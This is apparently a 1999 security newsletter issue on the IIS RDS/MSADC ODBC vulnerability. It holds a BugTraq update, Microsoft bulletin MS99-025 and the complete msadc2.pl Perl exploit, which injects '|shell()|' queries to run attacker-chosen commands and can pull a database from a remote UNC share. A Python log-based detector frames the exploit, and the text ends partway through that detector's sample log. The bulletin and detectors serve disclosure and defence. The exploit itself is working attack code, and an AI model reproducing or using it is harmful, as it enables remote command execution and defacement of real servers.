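    "dbq=c:\\winnt\\help\\iis\\htm\\tutorial\\btcustmr.mdb;",
)
UNC_BODY = encode_varg(
    "select * from AZZ where C='|shell(\"cmd /c dir\")|'",
    "driver={Microsoft Access Driver (*.mdb)};dbq=\\\\10.0.0.5\\share\\x.mdb;",
)
BENIGN_BODY = encode_varg("select path from scope()", "Provider=MSIDXS;")

if __name__ == "__main__":
    for name, body in (("exploit", EXPLOIT_BODY), ("unc", UNC_BODY),
                       ("benign", BENIGN_BODY)):
        print(name, classify(body))
```

     The decoder is deliberately strict: anything that is not a well-formed
     BSTR list is reported as undecodable rather than guessed at, which is
     the right failure mode for a detector that will be fed whatever a client
     chooses to POST.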

      
     EoF
     
     -=-
      

          
          
     Followup/update to IIS/RDS advisory      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
     
     
     To:     BugTraq
     Subject Update to ODBC/RDS vulnerabilities
     Date:   Tue Sep 21 1999 12:07:54
 
     Hello all,
 
     It's been a while since I've posted anything, and I promise it will be
     short this time. ;)
 
     Microsoft has released a patched Jet ODBC engine that will fix the ODBC
     problem as well as Mr. Cuartango's Excel vulnerabilities.
     Basically, this is a 3.51 engine retrofitted with a 'sandbox' restriction
     controlled by the following registry key:
 
     \\HKLM\Software\Microsoft\Jet\3.5\Engines\SandboxMode
 
     Also, as for the RDS problem, they recommended implementing custom
     handlers to limit invocation of the RDS component to legit uses. Custom
     handler support is controlled by the following registry key:
 
     \\HKLM\Software\Microsoft\DataFactory\HandlerInfo\handlerRequired
 
     Now, perhaps it's just me, but on three different NT boxes I have, which
     are various SP3 and 5 combos on NT4, patches installed as administrator,
     the permissions on these registry keys are Everyone -> Special Access,
     which includes Set Value. This basically means domain users can remotely
     disable handler and sandbox restrictions by changing the values of these
     keys. Hmmm. I've tested this, and it worked as expected.
 
     Also, Mnemonix pointed out an interesting aspect which I overlooked for
     the RDS vulnerability that really makes it more evil. The current
     limitation to the RDS exploit is that it requires a local file to 'attach'
     to, specifically a .mdb. Well, you can use UNC addresses for this file,
     so if you setup a Windows share on the internet, you can request your file
     off that, therefore bypassing the need for a local file. I've tested
     this, and it works as well.
 
     I am finishing updates to my RDS exploit program, which I'll probably
     release in the next week. It will implement all of this, plus clean up
     the code a bit.
 
     Also, I wanted to point out an omission of credit in the RDS advisory.
     Matthew Astley, who I co-wrote the May 25th advisory with the original
     ODBC info, should have been given credit as well for the ODBC/Jet pipe
     problem. Apologies to Matthew.
 
 
     .rain.forest.puppy.
     --------------------------------------------------------------------------
     If I had a signoff banner, it would be here. But I don't, so I'll fake it
     --------------------------------------------------------------------------     
     
     EoF
     
     -=-
     
     MS99-025: Microsoft advisory for RDS/IIS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     The following is a Security  Bulletin from the Microsoft Product Security
     Notification Service.

     Please do not  reply to this message,  as it was sent  from an unattended
     mailbox.
                         ********************************

     Microsoft Security Bulletin (MS99-025)
     --------------------------------------

     Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access
     with RDS

     Originally Released as MS98-004: July 17, 1998
     Re-Released as MS99-025: July 19, 1999
     Revised: July 23, 1999

     Summary
     =======
     Microsoft has identified a vulnerability in Microsoft(r) Data Access
     Components (MDAC) that could allow a web site visitor to take unauthorized
     actions on a web site hosted using Internet Information Server. The
     vulnerability can be eliminated by reconfiguring or removing the affected
     components of MDAC.


     This vulnerability originally was reported in Microsoft Security Bulletin
     MS98-004, issued July 17, 1998. It was re-released on July 19, 1999, to
     remind customers of the need to address the vulnerability. It was updated
     on July 23, 1999, to discuss the need to remove sample files that are
     affected by the vulnerability, and to clarify that MDAC 2.0 is affected
     even if deployed as a clean installation.


     Frequently asked questions regarding this vulnerability can be found at
     http://www.microsoft.com/security/bulletins/MS99-025faq.asp. The FAQ
     contains instructions for eliminating the vulnerability.

     Issue
     =====
     The RDS DataFactory object, a component of Microsoft Data Access
     Components (MDAC), exposes unsafe methods. When installed on a system
     running Internet Information Server 3.0 or 4.0, the DataFactory object
     may permit an otherwise unauthorized web user to perform privileged
     actions, including:
      - Allowing unauthorized users to execute shell commands on the
        IIS system as a privileged user.
      - On a multi-homed Internet-connected IIS system, using MDAC to
        tunnel SQL and other ODBC data requests through the public
        connection to a private back-end network.
      - Allowing unauthorized access to secured, non-published
        files on the IIS system.

     Affected Software Versions
     ==========================
     The vulnerability affects the Microsoft Data Access Components, when
     installed on a web server running Internet Information Server 3.0 or 4.0.
     Specifically:
      - MDAC 1.5 and 2.0 are affected
      - MDAC 2.1 is affected if installed as an upgrade from a
        previous version of MDAC, rather than a clean installation
      - Any version of MDAC is affected if Sample Pages for RDS are
        installed.

     NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option
     Pack and the MDAC 2.0 Software Development Kit. They are not installed by
     default in the Option Pack, but are installed by default in the MDAC 2.0
     SDK.

     NOTE: MDAC 1.5 and IIS are installed by default installations of the
     Windows NT 4.0 Option Pack.

     NOTE: IIS can be installed as part of other Microsoft products, such as
     Microsoft BackOffice and Microsoft Site Server. MDAC can be installed as
     part of other Microsoft products, such as Visual C and Microsoft Office.

     Patch Availability
     ==================
     This vulnerability requires a configuration change to eliminate it,
     rather than a patch. Details of the specific changes needed are available
     at:

     http://www.microsoft.com/security/bulletins/MS99-025faq.asp.

     More Information
     ================
     Please see the following references for more information related to this
     issue.
      - Microsoft Security Bulletin MS99-025: Frequently Asked Questions,
        http://www.microsoft.com/security/bulletins/MS99-025faq.asp
      - Microsoft Knowledge Base (KB) article Q184375,
        Security Implications of RDS 1.5, IIS, and ODBC,
        http://support.microsoft.com/support/kb/articles/q184/3/75.asp
      - Microsoft Universal Data Access Download Page,
        http://www.microsoft.com/data/download.htm
      - Installing MDAC Q&A,
        http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
      - Microsoft Security Advisor web site,
        http://www.microsoft.com/security/default.asp
      - IIS Security Checklist,
        http://www.microsoft.com/security/products/iis/CheckList.asp

     Obtaining Support on this Issue
     ===============================
     Microsoft Data Access Components (MDAC) is a fully supported set of
     technologies. If you require technical assistance with this issue,
     please contact Microsoft Technical Support. For information on
     contacting Microsoft Technical Support, please see
     http://support.microsoft.com/support/contact/default.asp.

     Acknowledgments
     ===============
     Microsoft acknowledges Greg Gonzalez of ITE (http://www.ite.com) for
     bringing additional information regarding this vulnerability to our
     attention, and .Rain.Forest.Puppy for identifying the involvement of
     Sample Pages for RDS. Microsoft also acknowledges Russ Cooper of NTBugTraq
     (http://www.ntbugtraq.com) for his assistance around this issue.

     Revisions
     =========
      - July 19, 1999: Bulletin Created as re-release of MS98-004.
      - July 23, 1999: Bulletin updated to discuss involvement of Sample Pages
        for RDS, and to clarify status of MDAC 2.0.

     ------------------------------------------------------------------------

     THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS
     IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES,
     EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY
     AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT
     CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER
     INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS
     PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS
     SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
     STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR
     CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT
     APPLY.

     (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

        *******************************************************************
     You have received  this e-mail bulletin as a result  of your registration
     to  the   Microsoft  Product  Security  Notification   Service.  You  may
     unsubscribe from this e-mail notification  service at any time by sending
     an  e-mail  to  MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
     The subject line and message body are not used in processing the request,
     and can be anything you like.

     For  more  information on  the  Microsoft  Security Notification  Service
     please visit http://www.microsoft.com/security/services/bulletin.asp. For
     security-related information  about Microsoft products, please  visit the
     Microsoft Security Advisor web site at http://www.microsoft.com/security.


     msadc2.pl
     ~~~~~~~~~
     
     Before the preceding advisory, this was the code commonly used to exploit
     and deface NT servers ...
     
     Source: PSS
     url:http://packetstorm.securify.com/9911-exploits/msadc2.pl
     
      #!/usr/bin/perl
      #
      # MSADC/RDS 'usage' (aka exploit) script version 2
      #
      #       by rain forest puppy
      #
      #       - added UNC support, really didn't clean up code, but oh well
      
      use Socket; use Getopt::Std;
      getopts("e:vd:h:XRVNwcu:s:", \%args);
      
      print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
      
      if (!defined $args{h} && !defined $args{R}) {
      print qq~
      Usage: msadc.pl -h <host> { -d <delay> -X -v }
              -h <host>               = host you want to scan (ip or domain)
              -d <seconds>            = delay between calls, default 1 second
              -X                      = dump Index Server path table, if available
              -N                      = query VbBusObj for NetBIOS name
              -V                      = use VbBusObj instead of ActiveDataFactory
              -v                      = verbose
              -e                      = external dictionary file for step 5
              -u <\\\\host\\share\\file>      = use UNC file
              -w                      = Windows 95 instead of Windows NT
              -c                      = v1 compatibility (three step query)
              -s <number>             = run only step <number>
      
              Or a -R will resume a (v2) command session
      
      ~; exit;}
      
      ###########################################################
      # config data
      
      @drives=("c","d","e","f","g","h");
      
      @sysdirs=("winnt","winnt35","winnt351","win","windows");
      
      # we want 'wicca' first, because if step 2 made the DSN, it's ready to go
      @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
              "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
              "banner", "banners", "ads", "ADCDemo", "ADCTest");
      
      # this is sparse, because I don't know of many
      @sysmdbs=(      "\\catroot\\icatalog.mdb",
                      "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
                      "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
                      "\\system32\\certmdb.mdb",
                      "\\system32\\ias\\ias.mdb",
                      "\\system32\\ias\\dnary.mdb",
                      "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
      @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
              "\\cfusion\\cfapps\\forums\\forums_.mdb",
              "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
              "\\cfusion\\cfapps\\security\\realm_.mdb",
              "\\cfusion\\cfapps\\security\\data\\realm.mdb",
              "\\cfusion\\database\\cfexamples.mdb",
              "\\cfusion\\database\\cfsnippets.mdb",
              "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
              "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
              "\\cfusion\\brighttiger\\database\\cleam.mdb",
              "\\cfusion\\database\\smpolicy.mdb",
              "\\cfusion\\database\cypress.mdb",
              "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
              "\\website\\cgi-win\\dbsample.mdb",
              "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
              "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
              );  #these are just \
      ###########################################################
      
      $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
      if (defined $args{v}) { $verbose=1; } else {$verbose=0;} 
      if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
      if(!defined $args{R}){ $target= inet_aton($ip) 
              || die("inet_aton problems; host doesn't exist?");}
      if (!defined $args{R}){ $ret = &has_msadc; }
      
      if (defined $args{X}) { &hork_idx; exit; }
      if (defined $args{N}) { &get_name; exit; }
      
      if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
      if (defined $args{R}) { &load; exit; }
      
      print "Type the command line you want to run ($comm assumed):\n"
              . "$comm ";
      $in=<STDIN>;    chomp $in;
      $command="$comm " . $in ;
      
      if (!defined $args{s} || $args{s}==1){
      print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
      &try_btcustmr;}
      
      if (!defined $args{s} || $args{s}==2){
      print "\nStep 2: Trying to make our own DSN...";
      if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
              print "<<fail>>\n"; }}   # we need to sleep to let the server catchup
      
      if (!defined $args{s} || $args{s}==3){
      print "\nStep 3: Trying known DSNs...";
      &known_dsn;}
      
      if (!defined $args{s} || $args{s}==4){
      print "\nStep 4: Trying known .mdbs...";
      &known_mdb;}
      
      if (!defined $args{s} || $args{s}==5){
      if (defined $args{u}){
      print "\nStep 5: Trying UNC...";
      &use_unc; } else { print "\nNo -u; Step 5 skipped.\n"; }}
      
      if (!defined $args{s} || $args{s}==6){
      if (defined $args{e}){
      print "\nStep 6: Trying dictionary of DSN names...";
      &dsn_dict; } else { print "\nNo -e; Step 6 skipped.\n"; }}
      
      print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
      exit;
      
      ##############################################################################
      
      sub sendraw {   # this saves the whole transaction anyway
              my ($pstr)=@_;
              socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                      die("Socket problems\n");
              if(connect(S,pack "SnA4x8",2,80,$target)){
                      open(OUT,">raw.out");   my @in;
                      select(S);      $|=1;   print $pstr;            
                      while(<S>){ print OUT $_; push @in, $_; 
                              print STDOUT "." if(defined $args{X});}
                      close(OUT); select(STDOUT); close(S); return @in;
              } else { die("Can't connect...\n"); }}
      
      ##############################################################################
      
      sub make_header {  # make the HTTP request
      my $aa, $bb;
      if (defined $args{V}){
      $aa="VbBusObj.VbBusObjCls.GetRecordset";
      $bb="2";
      } else {
      $aa="AdvancedDataFactory.Query";
      $bb="3";}
      
      $msadc=<<EOT
      POST /msadc/msadcs.dll/$aa HTTP/1.1
      User-Agent: ACTIVEDATA
      Host: $ip
      Content-Length: $clen
      Connection: Keep-Alive
      
      ADCClientVersion:01.06
      Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
      
      --!ADM!ROX!YOUR!WORLD!
      Content-Type: application/x-varg
      Content-Length: $reqlen
      
      EOT
      ;
      $msadc=~s/\n/\r\n/g;
      return $msadc;}
      
      ##############################################################################
      
      sub make_req {  # make the RDS request
      my ($switch, $p1, $p2)=@_;
      my $req=""; my $t1, $t2, $query, $dsn;
      
      if ($switch==1){ # this is the btcustmr.mdb query
      $query="Select * from Customers where City='|shell(\"$command\")|'";
      $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
              $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
      
      elsif ($switch==2){ # this is general make table query
      $query="create table AZZ (B int, C varchar(10))";
      $dsn="$p1";}
      
      elsif ($switch==3){ # this is general exploit table query
      $query="select * from AZZ where C='|shell(\"$command\")|'";
      $dsn="$p1";}
      
      elsif ($switch==4){ # attempt to hork file info from index server
      $query="select path from scope()";
      $dsn="Provider=MSIDXS;";}
      
      elsif ($switch==5){ # bad query
      $query="select";
      $dsn="$p1";}
      
      elsif ($switch==6){ # this is table-independent query (new)
      $query="select * from MSysModules where name='|shell(\"$command\")|'";
      $dsn="$p1";}
      
      $t1= make_unicode($query);
      $t2= make_unicode($dsn);
      if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
      $req.= "\x08\x00" . pack ("S1", length($t1));
      $req.= "\x00\x00" . $t1 ;
      $req.= "\x08\x00" . pack ("S1", length($t2));
      $req.= "\x00\x00" . $t2 ;
      $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
      return $req;}
      
      ##############################################################################
      
      sub make_unicode { # quick little function to convert to unicode
      my ($in)=@_; my $out;
      for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
      return $out;}
      
      ##############################################################################
      
      sub rdo_success {  # checks for RDO return success (this is kludge)
      my (@in) = @_; my $base=content_start(@in);
      if($in[$base]=~/multipart\/mixed/){
      return 1 if( $in[$base+10]=~/^\x09\x00/ );}
      return 0;}
      
      ##############################################################################
      
      sub make_dsn {  # this (tries to) make a DSN for us
      print "\nMaking DSN: ";
      foreach $drive (@drives) {
      print "$drive: ";
      my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
              "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
              . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
      $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
      return 0 if $2 eq "404"; # not found/doesn't exist
      if($2 eq "200") {
        foreach $line (@results) {
          return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
      } return 0;}
      
      ##############################################################################
      
      sub verify_exists {
      my ($page)=@_;
      my @results=sendraw("GET $page HTTP/1.0\n\n");
      return $results[0];}
      
      ##############################################################################
      
      sub try_btcustmr {
      
      foreach $dir (@sysdirs) {
       print "$dir -> "; # fun status so you can see progress
       foreach $drive (@drives) {
       print "$drive: ";  # ditto
      $reqlen=length( make_req(1,$drive,$dir) ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      
      my @results=sendraw(make_header() . make_req(1,$drive,$dir));
      if (rdo_success(@results)){print "Success!\n";
      
      save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
              exit;}
      else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
      
      ##############################################################################
      
      sub odbc_error {
      my (@in)=@_; my $base;
      my $base = content_start(@in);
      if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
      $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
      $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
      $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
      return $in[$base+4].$in[$base+5].$in[$base+6];}
      print "\nNON-STANDARD error.  Please send this info to rfp\@wiretrip.net:\n";
      print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
              $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
      
      ##############################################################################
      
      sub verbose {
      my ($in)=@_;
      return if !$verbose;
      print STDOUT "\n$in\n";}
      
      ##############################################################################
      
      sub save {
      my ($p1)=@_; my $ropt="";
      open(OUT, ">rds.save") || print "Problem saving parameters...\n";
      if (defined $args{c}){ $ropt="c ";}
      if (defined $args{V}){ $ropt.="V ";}
      if (defined $args{w}){ $ropt.="w ";}
      print OUT "v2\n$ip\n$ropt\n$p1\n";
      close OUT;}
      
      ##############################################################################
      
      sub load {
      my ($action)=@_;
      my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
      open(IN,"<rds.save") || die("Couldn't open rds.save\n");
      @p=<IN>; close(IN);
      die("Wrong rds.save version") if $p[0] ne "v2\n";
      $ip="$p[1]"; $ip=~s/\n//g;
      $target= inet_aton($ip) || die("inet_aton problems");
      print "Resuming to $ip ...";
      @switches=split(/ /,$p[2]);
      foreach $switch (@switches) {
              $args{$switch}="1";}
      
      if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
      print "Type the command line you want to run ($comm assumed):\n"
              . "$comm ";
      $in=<STDIN>;    chomp $in;
      $command="$comm " . $in ;
      
      $torun="$p[3]"; $torun=~s/\n//g;
      if($torun=~/btcustmr/){ 
              $args{'c'}="1";}   # this is a kludge to make it work
      
      if($torun=~/^dbq/){ $torun=$drvst.$torun; }
      
      if(run_query("$torun")){
              print "Success!\n";} else { print "failed\n"; }
      exit;}
      
      ##############################################################################
      
      sub create_table {
      return 1 if (!defined $args{c});
      return 1 if (defined $args{V});
      my ($in)=@_;
      $reqlen=length( make_req(2,$in,"") ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req(2,$in,""));
      return 1 if rdo_success(@results);
      my $temp= odbc_error(@results);  verbose($temp);
      return 1 if $temp=~/Table 'AZZ' already exists/;
      return 0;}
      
      ##############################################################################
      
      sub known_dsn {
      foreach $dSn (@dsns) {
              print ".";
              next if (!is_access("DSN=$dSn"));
              if(create_table("DSN=$dSn")){
              if(run_query("DSN=$dSn")){
              print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
      
      ##############################################################################
      
      sub is_access {
      my ($in)=@_;
      return 1 if (!defined $args{c});
      return 1 if (defined $args{V});
      $reqlen=length( make_req(5,$in,"") ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req(5,$in,""));
      my $temp= odbc_error(@results);
      verbose($temp); return 1 if ($temp=~/Microsoft Access/);
      return 0;}
      
      ##############################################################################
      
      sub run_query {
      my ($in)=@_; my $req;
      if (defined $args{c}){$req=3;} else {$req=6;}
      $reqlen=length( make_req($req,$in,"") ) - 28;
      
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req($req,$in,""));
      return 1 if rdo_success(@results);
      my $temp= odbc_error(@results);  verbose($temp);
      return 0;}
      
      ##############################################################################
      
      sub known_mdb {
      my @drives=("c","d","e","f","g");
      my @dirs=("winnt","winnt35","winnt351","win","windows");
      my $dir, $drive, $mdb;
      my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
      
      foreach $drive (@drives) {
       foreach $dir (@sysdirs){
        foreach $mdb (@sysmdbs) {
         print ".";
         if(create_table($drv.$drive.":\\".$dir.$mdb)){
          if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
           print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; 
          }}}}}
      
       foreach $drive (@drives) {
        foreach $mdb (@mdbs) {
         print ".";
         if(create_table($drv.$drive.":".$mdb)){
          if(run_query($drv.$drive.":".$mdb)){
           print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; 
          }}}}
      }
      
      ##############################################################################
      
      sub hork_idx {
      print "\nAttempting to dump Index Server tables...\n";
      print "  NOTE:  Sometimes this takes a while, other times it stalls\n\n";
      $reqlen=length( make_req(4,"","") ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req(4,"",""));
      if (rdo_success(@results)){
      my $max=@results; my $c; my %d;
      for($c=19; $c<$max; $c++){
              $results[$c]=~s/\x00//g;
              $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
              $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
              $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
              $d{"$1$2"}="";}
      foreach $c (keys %d){ print "$c\n"; }
      } else {print "Index server not installed/query failed\n"; }}
      
      ##############################################################################
      
      sub dsn_dict {
      open(IN, "<$args{e}") || die("Can't open external dictionary\n");
      while(<IN>){
              $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
              next if (!is_access("DSN=$dSn"));
              if(create_table("DSN=$dSn")){
              if(run_query("DSN=$dSn")){
              print "Success!\n"; save ("dsn=$dSn"); exit; }}} 
      print "\n"; close(IN);}
      
      ##############################################################################
      
      sub content_start { # this will take in the server headers
      my (@in)=@_; my $c;
      for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
       if($in[$c] =~/^\x0d\x0a/){
        if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
        else { return $c+1; }}}
      return -1;} # it should never get here actually 
      
      ##############################################################################
      
      sub funky {
      my (@in)=@_; my $error=odbc_error(@in);
      if($error=~/ADO could not find the specified provider/){
      print "\nServer returned an ADO misconfiguration message\nAborting.\n";
      exit;}
      if($error=~/A Handler is required/){
      print "\nServer has custom handler filters (they most likely are patched)\n";
      exit;}
      if($error=~/specified Handler has denied Access/){
      print "\nADO handlers denied access (they most likely are patched)\n";
      exit;}
      if($error=~/server has denied access/){
      print "\nADO handlers denied access (they most likely are patched)\n";
      exit;}}
      
      ##############################################################################
      
      sub has_msadc {
      my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
      my $base=content_start(@results);
      return if($results[$base]=~/Content-Type: application\/x-varg/);
      my @s=grep("^Server:",@results);
      if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
      else { print "/msadc/msadcs.dll was not found.\n";}
      exit;}
      
      ##############################################################################
      
      sub use_unc {
      $uncpath=$args{u};
      $driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
      if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
              print   "Your UNC path sucks.  You need the following format:\n".
                      "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
      
      if(create_table($driverline.$uncpath)){
        if(run_query($driverline.$uncpath)){
           print "Success!\n"; save ("dbq=".$uncpath); exit;}}
      }
      
      ##############################################################################
      
      sub get_name { # this was added last minute
      my $msadc=<<EOT
      POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
      User-Agent: ACTIVEDATA
      Host: $ip
      Content-Length: 126
      Connection: Keep-Alive
      
      ADCClientVersion:01.06
      Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
      
      --!ADM!ROX!YOUR!WORLD!--
      EOT
      ;  $msadc=~s/\n/\r\n/g;
      my @results=sendraw($msadc);
      my $base=content_start(@results);
      $results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
      print "Machine name: $results[$base+6]\n";}
      
      ##############################################################################
      # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
      # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and 
      # good friends!), wiretrip, l0pht, nmrc & all of phrack
      #
      # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
      #
      # I wish I could really name everyone, but I can't.  Don't feel slighted if
      # your not on the list... :)
      ##############################################################################
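     The script above leaves a recognisable trail in the IIS logs: a probe for
     /msadc/msadcs.dll, an optional GET to /scripts/tools/newdsn.exe with
     newdb=CREATE_DB (step 2), and POSTs to
     /msadc/msadcs.dll/AdvancedDataFactory.Query or the VbBusObj methods. The
     following detector is an added example for this issue, not rfp's code or
     anything from Microsoft; it reads IIS W3C extended log lines, takes the
     column names from the #Fields: header, and flags those request shapes.
     The log lines embedded in it are constructed for the example, and the
     helper names (parse_w3c, classify, scan) are my own.

```python
"""Flag RDS/MSADC probe and exploitation attempts in IIS W3C extended logs.

Added example, not part of the HWA issue or of msadc2.pl. The request shapes
matched here are the ones the script above emits; the sample log is made up.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List, Optional, Tuple
from urllib.parse import parse_qs

RDS_ENDPOINT = "/msadc/msadcs.dll"
# Object.Method suffixes the script POSTs to, lower-cased for comparison.
RDS_METHODS = {
    "advanceddatafactory.query": "AdvancedDataFactory.Query (RDS query)",
    "vbbusobj.vbbusobjcls.getrecordset": "VbBusObj.GetRecordset (-V switch)",
    "vbbusobj.vbbusobjcls.getmachinename": "VbBusObj.GetMachineName (-N switch)",
}
NEWDSN_TOOL = "/scripts/tools/newdsn.exe"


@dataclass
class Finding:
    line_no: int
    client: str
    reason: str


def parse_w3c(lines: Iterable[str]) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line number, record) using the '#Fields:' directive for column names."""
    fields: Optional[List[str]] = None
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields: line
        cols = line.split(" ")
        if len(cols) != len(fields):
            continue  # malformed record: skip rather than guess the columns
        yield n, dict(zip(fields, cols))


def classify(rec: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the record looks like RDS abuse, else None."""
    method = rec.get("cs-method", "").upper()
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "-")
    if stem.startswith(RDS_ENDPOINT):
        rest = stem[len(RDS_ENDPOINT):]
        if rest and not rest.startswith("/"):
            return None  # some other file whose name merely begins the same way
        suffix = rest.lstrip("/")
        if suffix == "":
            return "probe for RDS endpoint (has_msadc check)"
        if method == "POST" and suffix in RDS_METHODS:
            return "RDS call: " + RDS_METHODS[suffix]
        return f"unexpected access to RDS endpoint ({method} {suffix})"
    if stem == NEWDSN_TOOL:
        params = parse_qs(query) if query != "-" else {}
        if params.get("newdb") == ["CREATE_DB"]:
            return "DSN creation via newdsn.exe (make_dsn step)"
        return "access to newdsn.exe sample tool"
    return None


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run classify() over every record and collect the hits."""
    return [Finding(n, rec.get("c-ip", "?"), reason)
            for n, rec in parse_w3c(lines)
            if (reason := classify(rec))]


# Constructed sample log (IIS logs substitute '+' for spaces and '-' for empty).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
1999-07-20 03:14:01 10.0.0.5 GET /default.htm - 200 Mozilla/4.0
1999-07-20 03:14:07 10.0.0.5 GET /msadc/msadcs.dll - 200 -
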